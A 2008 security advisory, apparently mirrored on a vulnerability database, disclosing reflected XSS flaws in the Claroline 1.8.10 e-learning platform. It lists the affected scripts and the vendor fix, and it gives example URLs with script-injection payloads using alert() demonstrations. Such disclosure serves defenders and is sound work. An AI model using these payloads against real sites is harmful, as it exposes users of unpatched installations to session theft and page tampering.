Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20214
HistoryJul 24, 2008 - 12:00 a.m.

[DSECRG-08-032] Claroline 1.8.10 Multiple XSS Vulnerabilities

2008-07-2400:00:00
vulners.com
22
JSON

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-032

Application: Claroline eLearning and eWorking platform
Versions Affected: 1.8.10
Vendor URL: http://www.claroline.net/
Bug: Multiple Linked XSS
Exploits: YES
Reported: 18.07.2008
Vendor Response: 22.07.2008
Solution: YES
Date of Public Advisory: 22.07.2008
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description

Claroline system has multiple linked XSS vulnerabilities.

Details

  1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL string

1.1 Linked XSS vulnerabilities found in scripts:

claroline/announcements/messages.php
claroline/auth/lostPassword.php
claroline/auth/profile.php
claroline/calendar/myagenda.php
claroline/group/group.php
claroline/learnPath/learningPath.php
claroline/learnPath/learningPathList.php
claroline/learnPath/module.php
claroline/phpbb/index.php
claroline/tracking/courseLog.php
claroline/tracking/course_access_details.php
claroline/tracking/delete_course_stats.php
claroline/tracking/userLog.php
claroline/tracking/user_access_details.php
claroline/user/user.php
claroline/user/userInfo.php

Attacker can inject XSS in URL string.

Example:

http://[server]/[installdir]/claroline/calendar/myagenda.php?"><script>alert('DSecRG XSS')</script>
http://[server]/[installdir]/claroline/user/user.php?"><script>alert('DSecRG XSS')</script>

1.2 Linked XSS vulnerability found in claroline/tracking/courseLog.php

GET parameter "view"

Example:

http://[server]/[installdir]/claroline/tracking/courseLog.php?view=DSec"
STYLE="xss:expression(alert('DSecRG XSS'))

1.3 Linked XSS vulnerability found in claroline/tracking/toolaccess_details.php

GET parameter "toolId"

Example:

http://[server]/[installdir]/claroline/tracking/toolaccess_details.php?toolId="><script>alert('DSecRG
XSS')</script>

Solution

Vendor fix this flaw on 22.07.2008. New version 1.8.11 can be downloaded here:

http://downloads.sourceforge.net/claroline/claroline1811.tar.gz
http://downloads.sourceforge.net/claroline/claroline1811.zip

About

Digital Security is leading IT security company in Russia, providing information security consulting,
audit and penetration testing services, risk analysis and ISMS-related services and certification for
ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and whitepapers posted regularly
on our website.

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

JSON